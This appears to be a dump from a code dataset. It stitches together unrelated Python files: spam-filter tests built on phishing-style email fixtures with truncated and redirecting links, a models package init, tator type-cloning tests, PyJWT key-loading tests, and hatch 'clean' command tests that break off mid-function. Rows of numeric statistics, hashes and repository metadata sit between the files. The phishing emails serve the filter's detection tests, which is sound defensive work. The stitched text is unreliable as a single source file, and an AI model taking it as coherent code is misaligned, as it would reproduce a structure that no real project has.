self.check_report(result, 1, ['CHECK_URI_TRUNCATED'])
def test_check_for_uri_truncated_and_redirector_after(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://%s.com/https://ceva.com">https://test.com</a>
</html>"""
email = email % (self.long_text)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_uri_truncated_redirector_before_and_ip_mismatch(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<a href="http://1.2.3.4/https://%s.com/">https://test.com</a>
</html>"""
email = email % (self.long_text)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 3, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR','CHECK_HTTPS_IP_MISMATCH'])
def test_check_for_uri_truncated_link_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://%s.com">
</html>"""
email = email % (self.long_text)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 1, ['CHECK_URI_TRUNCATED'])
def test_check_for_uri_truncated_superior_limit_link_label(self):
mytext1 = [random.choice(ascii_letters + digits) for _ in range(8181)]
long_text1 = "".join(mytext1)
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://%s.com">
</html>"""
email = email % (long_text1)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 0, [])
def test_check_for_uri_truncated_and_redirector_after_link_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://%s.com/https://%s.com/https://ceva.com">
</html>"""
email = email % (self.long_text, self.long_text)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR'])
def test_check_for_uri_truncated_redirector_before_link_label(self):
email = """From: sender@example.com
Content-Type: text/html
\n<html>
Dear user,
Your account has been limited please follow the instructions on the next link:
<link href="http://1.2.3.4/https://1.2.3.4/https://%s.com/">
</html>"""
email = email % (self.long_text)
self.setup_conf(config=CONFIG, pre_config=PRE_CONFIG)
result = self.check_pad(email)
self.check_report(result, 2, ['CHECK_URI_TRUNCATED', 'CHECK_FOR_HTTP_REDIRECTOR'])
def suite():
"""Gather all the tests from this package in a test suite."""
test_suite = unittest.TestSuite()
test_suite.addTest(unittest.makeSuite(TestFunctionalURIEval, "test"))
return test_suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 34.770652
| 124
| 0.701429
| 4,928
| 31,989
| 4.343141
| 0.043831
| 0.053404
| 0.088305
| 0.044153
| 0.942578
| 0.939401
| 0.937158
| 0.930103
| 0.922628
| 0.917348
| 0
| 0.02831
| 0.156366
| 31,989
| 919
| 125
| 34.808487
| 0.764776
| 0.006752
| 0
| 0.788732
| 0
| 0.092958
| 0.484175
| 0.037193
| 0
| 0
| 0
| 0
| 0
| 1
| 0.090141
| false
| 0
| 0.009859
| 0
| 0.105634
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b984ca137f26611b06781b40dbc5d934bb3499d1
| 166
|
py
|
Python
|
app/models/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | 2
|
2021-02-15T21:02:12.000Z
|
2021-10-14T19:05:34.000Z
|
app/models/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
app/models/__init__.py
|
Luca-A-Magalhaes/himcd
|
56c939bb077485adb8a75b37bf0655e1087bbfa4
|
[
"MIT"
] | null | null | null |
from app.models.base import Base
from app.models.event import *
from app.models.user import *
from app.models.country import *
from app.models.country_status import *
| 33.2
| 39
| 0.801205
| 27
| 166
| 4.888889
| 0.333333
| 0.265152
| 0.492424
| 0.431818
| 0.393939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114458
| 166
| 5
| 39
| 33.2
| 0.897959
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
e0560d0780ce2fda9f86907e09eb0cafa8dc84b9
| 1,517
|
py
|
Python
|
test/test_clone_localization_type.py
|
cvisionai/tator-py
|
89d5ed3bfc3e824bdf73b6c0fc43180e09dc3782
|
[
"MIT"
] | 2
|
2020-06-11T02:17:43.000Z
|
2021-01-27T14:41:07.000Z
|
test/test_clone_localization_type.py
|
cvisionai/tator-py
|
89d5ed3bfc3e824bdf73b6c0fc43180e09dc3782
|
[
"MIT"
] | 39
|
2020-06-08T15:12:47.000Z
|
2022-03-31T20:05:17.000Z
|
test/test_clone_localization_type.py
|
cvisionai/tator-py
|
89d5ed3bfc3e824bdf73b6c0fc43180e09dc3782
|
[
"MIT"
] | 1
|
2020-06-13T00:09:10.000Z
|
2020-06-13T00:09:10.000Z
|
import tator
def test_clone_localization_type_same_host(host, token, project, image_type, video_type,
box_type, clone_project):
tator_api = tator.get_api(host, token)
response = tator.util.clone_media_type(tator_api, video_type, clone_project)
dest_video_type = response.id
response = tator.util.clone_media_type(tator_api, image_type, clone_project)
dest_image_type = response.id
response = tator.util.clone_localization_type(tator_api, box_type, clone_project,
{video_type: dest_video_type,
image_type: dest_image_type})
assert(isinstance(response, tator.models.CreateResponse))
def test_clone_localization_type_different_host(host, token, project, image_type, video_type,
box_type, clone_project):
tator_api = tator.get_api(host, token)
response = tator.util.clone_media_type(tator_api, video_type, clone_project)
dest_video_type = response.id
response = tator.util.clone_media_type(tator_api, image_type, clone_project)
dest_image_type = response.id
response = tator.util.clone_localization_type(tator_api, box_type, clone_project,
{video_type: dest_video_type,
image_type: dest_image_type}, tator_api)
assert(isinstance(response, tator.models.CreateResponse))
| 56.185185
| 93
| 0.645353
| 178
| 1,517
| 5.089888
| 0.146067
| 0.099338
| 0.14128
| 0.145695
| 0.96468
| 0.90287
| 0.794702
| 0.794702
| 0.794702
| 0.794702
| 0
| 0
| 0.285432
| 1,517
| 26
| 94
| 58.346154
| 0.835793
| 0
| 0
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 1
| 0.086957
| false
| 0
| 0.043478
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0787f468a844a6da19f87a98fd4c593bb0a352b
| 7,966
|
py
|
Python
|
tests/test_api_jwk.py
|
michael-k/pyjwt
|
f02fa0dc87bfa7bc471f3d6d3ca579d66e8f95e0
|
[
"MIT"
] | null | null | null |
tests/test_api_jwk.py
|
michael-k/pyjwt
|
f02fa0dc87bfa7bc471f3d6d3ca579d66e8f95e0
|
[
"MIT"
] | null | null | null |
tests/test_api_jwk.py
|
michael-k/pyjwt
|
f02fa0dc87bfa7bc471f3d6d3ca579d66e8f95e0
|
[
"MIT"
] | null | null | null |
import json
import pytest
from jwt.algorithms import has_crypto
from jwt.api_jwk import PyJWK, PyJWKSet
from jwt.exceptions import InvalidKeyError, PyJWKError
from .utils import crypto_required, key_path
if has_crypto:
from jwt.algorithms import (
ECAlgorithm,
Ed25519Algorithm,
HMACAlgorithm,
RSAAlgorithm,
)
class TestPyJWK:
@crypto_required
def test_should_load_key_from_jwk_data_dict(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with open(key_path("jwk_rsa_pub.json")) as keyfile:
pub_key = algo.from_jwk(keyfile.read())
key_data_str = algo.to_jwk(pub_key)
key_data = json.loads(key_data_str)
# TODO Should `to_jwk` set these?
key_data["alg"] = "RS256"
key_data["use"] = "sig"
key_data["kid"] = "keyid-abc123"
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "RSA"
assert jwk.key_id == "keyid-abc123"
assert jwk.public_key_use == "sig"
@crypto_required
def test_should_load_key_from_jwk_data_json_string(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with open(key_path("jwk_rsa_pub.json")) as keyfile:
pub_key = algo.from_jwk(keyfile.read())
key_data_str = algo.to_jwk(pub_key)
key_data = json.loads(key_data_str)
# TODO Should `to_jwk` set these?
key_data["alg"] = "RS256"
key_data["use"] = "sig"
key_data["kid"] = "keyid-abc123"
jwk = PyJWK.from_json(json.dumps(key_data))
assert jwk.key_type == "RSA"
assert jwk.key_id == "keyid-abc123"
assert jwk.public_key_use == "sig"
@crypto_required
def test_should_load_key_without_alg_from_dict(self):
with open(key_path("jwk_rsa_pub.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "RSA"
assert isinstance(jwk.Algorithm, RSAAlgorithm)
assert jwk.Algorithm.hash_alg == RSAAlgorithm.SHA256
@crypto_required
def test_should_load_key_from_dict_with_algorithm(self):
with open(key_path("jwk_rsa_pub.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data, algorithm="RS256")
assert jwk.key_type == "RSA"
assert isinstance(jwk.Algorithm, RSAAlgorithm)
assert jwk.Algorithm.hash_alg == RSAAlgorithm.SHA256
@crypto_required
def test_should_load_key_ec_p256_from_dict(self):
with open(key_path("jwk_ec_pub_P-256.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "EC"
assert isinstance(jwk.Algorithm, ECAlgorithm)
assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA256
@crypto_required
def test_should_load_key_ec_p384_from_dict(self):
with open(key_path("jwk_ec_pub_P-384.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "EC"
assert isinstance(jwk.Algorithm, ECAlgorithm)
assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA384
@crypto_required
def test_should_load_key_ec_p521_from_dict(self):
with open(key_path("jwk_ec_pub_P-521.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "EC"
assert isinstance(jwk.Algorithm, ECAlgorithm)
assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA512
@crypto_required
def test_should_load_key_ec_secp256k1_from_dict(self):
with open(key_path("jwk_ec_pub_secp256k1.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "EC"
assert isinstance(jwk.Algorithm, ECAlgorithm)
assert jwk.Algorithm.hash_alg == ECAlgorithm.SHA256
@crypto_required
def test_should_load_key_hmac_from_dict(self):
with open(key_path("jwk_hmac.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "oct"
assert isinstance(jwk.Algorithm, HMACAlgorithm)
assert jwk.Algorithm.hash_alg == HMACAlgorithm.SHA256
@crypto_required
def test_should_load_key_hmac_without_alg_from_dict(self):
with open(key_path("jwk_hmac.json")) as keyfile:
key_data = json.loads(keyfile.read())
del key_data["alg"]
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "oct"
assert isinstance(jwk.Algorithm, HMACAlgorithm)
assert jwk.Algorithm.hash_alg == HMACAlgorithm.SHA256
@crypto_required
def test_should_load_key_okp_without_alg_from_dict(self):
with open(key_path("jwk_okp_pub_Ed25519.json")) as keyfile:
key_data = json.loads(keyfile.read())
jwk = PyJWK.from_dict(key_data)
assert jwk.key_type == "OKP"
assert isinstance(jwk.Algorithm, Ed25519Algorithm)
@crypto_required
def test_from_dict_should_throw_exception_if_arg_is_invalid(self):
with open(key_path("jwk_rsa_pub.json")) as keyfile:
valid_rsa_pub = json.loads(keyfile.read())
with open(key_path("jwk_ec_pub_P-256.json")) as keyfile:
valid_ec_pub = json.loads(keyfile.read())
with open(key_path("jwk_okp_pub_Ed25519.json")) as keyfile:
valid_okp_pub = json.loads(keyfile.read())
# Unknown algorithm
with pytest.raises(PyJWKError):
PyJWK.from_dict(valid_rsa_pub, algorithm="unknown")
# Missing kty
v = valid_rsa_pub.copy()
del v["kty"]
with pytest.raises(InvalidKeyError):
PyJWK.from_dict(v)
# Unknown kty
v = valid_rsa_pub.copy()
v["kty"] = "unknown"
with pytest.raises(InvalidKeyError):
PyJWK.from_dict(v)
# Unknown EC crv
v = valid_ec_pub.copy()
v["crv"] = "unknown"
with pytest.raises(InvalidKeyError):
PyJWK.from_dict(v)
# Unknown OKP crv
v = valid_okp_pub.copy()
v["crv"] = "unknown"
with pytest.raises(InvalidKeyError):
PyJWK.from_dict(v)
# Missing OKP crv
v = valid_okp_pub.copy()
del v["crv"]
with pytest.raises(InvalidKeyError):
PyJWK.from_dict(v)
class TestPyJWKSet:
@crypto_required
def test_should_load_keys_from_jwk_data_dict(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with open(key_path("jwk_rsa_pub.json")) as keyfile:
pub_key = algo.from_jwk(keyfile.read())
key_data_str = algo.to_jwk(pub_key)
key_data = json.loads(key_data_str)
# TODO Should `to_jwk` set these?
key_data["alg"] = "RS256"
key_data["use"] = "sig"
key_data["kid"] = "keyid-abc123"
jwk_set = PyJWKSet.from_dict({"keys": [key_data]})
jwk = jwk_set.keys[0]
assert jwk.key_type == "RSA"
assert jwk.key_id == "keyid-abc123"
assert jwk.public_key_use == "sig"
@crypto_required
def test_should_load_keys_from_jwk_data_json_string(self):
algo = RSAAlgorithm(RSAAlgorithm.SHA256)
with open(key_path("jwk_rsa_pub.json")) as keyfile:
pub_key = algo.from_jwk(keyfile.read())
key_data_str = algo.to_jwk(pub_key)
key_data = json.loads(key_data_str)
# TODO Should `to_jwk` set these?
key_data["alg"] = "RS256"
key_data["use"] = "sig"
key_data["kid"] = "keyid-abc123"
jwk_set = PyJWKSet.from_json(json.dumps({"keys": [key_data]}))
jwk = jwk_set.keys[0]
assert jwk.key_type == "RSA"
assert jwk.key_id == "keyid-abc123"
assert jwk.public_key_use == "sig"
| 30.638462
| 70
| 0.643234
| 1,065
| 7,966
| 4.507042
| 0.09108
| 0.068542
| 0.0425
| 0.05
| 0.86
| 0.855208
| 0.847292
| 0.839583
| 0.814375
| 0.801042
| 0
| 0.021116
| 0.250942
| 7,966
| 259
| 71
| 30.756757
| 0.783308
| 0.027115
| 0
| 0.714286
| 0
| 0
| 0.073007
| 0.020287
| 0
| 0
| 0
| 0.003861
| 0.217143
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.131429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ebcb7a9a7680a86597b1922d771c8e4087ac774
| 19,981
|
py
|
Python
|
tests/commands/test_clean.py
|
kapb14/hatch
|
e7f7e094571780d6499d41960999134966ae699d
|
[
"Apache-2.0",
"MIT"
] | 1
|
2018-03-15T17:27:37.000Z
|
2018-03-15T17:27:37.000Z
|
tests/commands/test_clean.py
|
anmolsrivastava05/hatch
|
df2c9d46ee7713a1bc156c361cfd0f78e5935297
|
[
"Apache-2.0"
] | null | null | null |
tests/commands/test_clean.py
|
anmolsrivastava05/hatch
|
df2c9d46ee7713a1bc156c361cfd0f78e5935297
|
[
"Apache-2.0"
] | null | null | null |
import os
from click.testing import CliRunner
from hatch.cli import hatch
from hatch.env import install_packages
from hatch.utils import create_file, temp_chdir
from hatch.venv import create_venv, venv
def find_all_files(d):
return [
os.path.join(root, file)
for root, dirs, files in os.walk(d)
for file in files
]
def assert_files_exist(files):
for file in files:
assert os.path.exists(file)
def test_cwd():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
test_file1 = os.path.join(d, 'test.pyc')
test_file2 = os.path.join(d, 'ok.egg-info', 'entry_points.txt')
create_file(test_file1)
create_file(test_file2)
assert os.path.exists(test_file1)
assert os.path.exists(test_file2)
result = runner.invoke(hatch, ['clean'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file1)
assert not os.path.exists(os.path.join(d, 'ok.egg-info'))
assert_files_exist(files)
def test_project_ignore_venv():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
test_file1 = os.path.join(d, 'test.pyc')
test_file2 = os.path.join(d, 'venv', 'test.pyc')
create_file(test_file1)
create_file(test_file2)
assert os.path.exists(test_file1)
assert os.path.exists(test_file2)
result = runner.invoke(hatch, ['clean'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file1)
assert os.path.exists(test_file2)
assert_files_exist(files)
def test_project_venv_no_detect():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
test_file1 = os.path.join(d, 'test.pyc')
test_file2 = os.path.join(d, 'venv', 'test.pyc')
create_file(test_file1)
create_file(test_file2)
assert os.path.exists(test_file1)
assert os.path.exists(test_file2)
result = runner.invoke(hatch, ['clean', '-nd'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file1)
assert not os.path.exists(test_file2)
assert_files_exist(files)
def test_cwd_compiled_only():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
test_file1 = os.path.join(d, 'test.pyc')
test_file2 = os.path.join(d, 'ok', 'test.pyc')
test_file3 = os.path.join(d, 'ok', 'deeper', 'test.pyc')
create_file(test_file1)
create_file(test_file2)
create_file(test_file3)
assert os.path.exists(test_file1)
assert os.path.exists(test_file2)
assert os.path.exists(test_file3)
result = runner.invoke(hatch, ['clean', '-c'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file1)
assert not os.path.exists(test_file2)
assert not os.path.exists(test_file3)
assert_files_exist(files)
def test_compiled_only_project_ignore_venv():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
test_file1 = os.path.join(d, 'test.pyc')
test_file2 = os.path.join(d, 'ok', 'test.pyc')
test_file3 = os.path.join(d, 'ok', 'deeper', 'test.pyc')
test_file4 = os.path.join(d, 'venv', 'test.pyc')
create_file(test_file1)
create_file(test_file2)
create_file(test_file3)
create_file(test_file4)
assert os.path.exists(test_file1)
assert os.path.exists(test_file2)
assert os.path.exists(test_file3)
assert os.path.exists(test_file4)
result = runner.invoke(hatch, ['clean', '-c'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file1)
assert not os.path.exists(test_file2)
assert not os.path.exists(test_file3)
assert os.path.exists(test_file4)
assert_files_exist(files)
def test_compiled_only_project_venv_no_detect():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
test_file1 = os.path.join(d, 'test.pyc')
test_file2 = os.path.join(d, 'ok', 'test.pyc')
test_file3 = os.path.join(d, 'ok', 'deeper', 'test.pyc')
test_file4 = os.path.join(d, 'venv', 'test.pyc')
create_file(test_file1)
create_file(test_file2)
create_file(test_file3)
create_file(test_file4)
assert os.path.exists(test_file1)
assert os.path.exists(test_file2)
assert os.path.exists(test_file3)
assert os.path.exists(test_file4)
result = runner.invoke(hatch, ['clean', '-c', '-nd'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file1)
assert not os.path.exists(test_file2)
assert not os.path.exists(test_file3)
assert not os.path.exists(test_file4)
assert_files_exist(files)
def test_package():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', 'ok', '--cli', '-ne'])
package_dir = os.path.join(d, 'ok')
files = find_all_files(package_dir)
test_file = os.path.join(package_dir, 'test.pyc')
create_file(test_file)
assert os.path.exists(test_file)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir):
os.chdir(package_dir)
install_packages(['-e', '.'])
os.chdir(d)
result = runner.invoke(hatch, ['clean', 'ok'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file)
assert os.path.exists(os.path.join(package_dir, 'ok.egg-info'))
assert_files_exist(files)
def test_package_not_exist():
with temp_chdir() as d:
runner = CliRunner()
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir):
result = runner.invoke(hatch, ['clean', 'ok'])
assert result.exit_code == 1
assert '`{}` is not an editable package.'.format('ok') in result.output
def test_local():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', 'ok', '--cli', '-ne'])
package_dir = os.path.join(d, 'ok')
files = find_all_files(package_dir)
test_file = os.path.join(package_dir, 'test.pyc')
create_file(test_file)
assert os.path.exists(test_file)
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir):
install_packages(['-e', package_dir])
result = runner.invoke(hatch, ['clean', '-l'])
assert result.exit_code == 0
assert 'Package `ok` has been selected.' in result.output
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file)
assert os.path.exists(os.path.join(package_dir, 'ok.egg-info'))
assert_files_exist(files)
def test_local_not_exist():
with temp_chdir() as d:
runner = CliRunner()
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir):
result = runner.invoke(hatch, ['clean', '-l'])
assert result.exit_code == 1
assert 'There are no local packages available.' in result.output
def test_local_multiple():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
venv_dir = os.path.join(d, 'venv')
create_venv(venv_dir)
with venv(venv_dir):
install_packages(['-e', os.path.join(d, 'ok')])
install_packages(['-e', os.path.join(d, 'ko')])
result = runner.invoke(hatch, ['clean', '-l'])
assert result.exit_code == 1
assert (
'There are multiple local packages available. '
'Select one with the optional argument.'
) in result.output
def test_path_relative():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
package_dir = os.path.join(d, 'ok')
files = find_all_files(package_dir)
test_file = os.path.join(package_dir, 'test.pyc')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-p', 'ok'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_path_full():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
runner.invoke(hatch, ['new', 'ko', '--basic', '-ne'])
package_dir = os.path.join(d, 'ok')
files = find_all_files(package_dir)
test_file = os.path.join(package_dir, 'test.pyc')
create_file(test_file)
assert os.path.exists(test_file)
os.chdir(os.path.join(d, 'ko'))
result = runner.invoke(hatch, ['clean', '-p', package_dir])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_path_full_not_exist():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['new', 'ok', '--basic', '-ne'])
full_path = os.path.join(d, 'ko')
result = runner.invoke(hatch, ['clean', '-p', full_path])
assert result.exit_code == 1
assert 'Directory `{}` does not exist.'.format(full_path) in result.output
def test_cache():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
create_file(os.path.join(d, 'ok', '.cache', 'v', 'cache', 'lastfailed'))
files = find_all_files(d)
test_file = os.path.join(d, '.cache', 'v', 'cache', 'lastfailed')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
os.path.join(d, '.cache'),
test_file
)
) in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_coverage():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
create_file(os.path.join(d, 'ok', '.coverage'))
files = find_all_files(d)
test_file = os.path.join(d, '.coverage')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'.format(test_file)
) in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_eggs():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
create_file(os.path.join(d, 'ok', '.eggs', 'ok.egg'))
files = find_all_files(d)
test_file = os.path.join(d, '.eggs', 'ok.egg')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
os.path.join(d, '.eggs'),
test_file
)
) in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_tox():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
create_file(os.path.join(d, 'ok', '.tox', 'dist', 'ok.zip'))
files = find_all_files(d)
test_file = os.path.join(d, '.tox', 'dist', 'ok.zip')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
os.path.join(d, '.tox'),
test_file
)
) in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_build():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
create_file(os.path.join(d, 'ok', 'build', 'lib', 'ok', 'ok.py'))
files = find_all_files(d)
test_file = os.path.join(d, 'build', 'lib', 'ok', 'ok.py')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
os.path.join(d, 'build'),
test_file
)
) in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_dist():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
create_file(os.path.join(d, 'ok', 'dist', 'ok.whl'))
files = find_all_files(d)
test_file = os.path.join(d, 'dist', 'ok.whl')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
os.path.join(d, 'dist'),
test_file
)
) in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_egg_info():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
create_file(os.path.join(d, 'ok', 'ok.egg-info', 'PKG-INFO'))
files = find_all_files(d)
test_file = os.path.join(d, 'ok.egg-info', 'PKG-INFO')
create_file(test_file)
assert os.path.exists(test_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'.format(
os.path.join(d, 'ok.egg-info'),
test_file
)
) in result.output
assert not os.path.exists(test_file)
assert_files_exist(files)
def test_pycache():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
root_file = os.path.join(d, '__pycache__', 'ok.txt')
create_file(root_file)
assert os.path.exists(root_file)
non_root_file = os.path.join(d, 'ok', '__pycache__', 'ok.txt')
create_file(non_root_file)
assert os.path.exists(non_root_file)
result = runner.invoke(hatch, ['clean', '-v'])
assert result.exit_code == 0
assert 'Cleaned!' in result.output
assert (
'Removed paths:\n'
'{}\n'
'{}\n'
'{}\n'
'{}\n'.format(
os.path.join(d, '__pycache__'),
root_file,
os.path.join(d, 'ok', '__pycache__'),
non_root_file
)
) in result.output
assert not os.path.exists(root_file)
assert not os.path.exists(non_root_file)
assert_files_exist(files)
def test_pyc():
with temp_chdir() as d:
runner = CliRunner()
runner.invoke(hatch, ['init', 'ok', '--basic', '-ne'])
files = find_all_files(d)
root_file = os.path.join(d, 'ok.pyc')
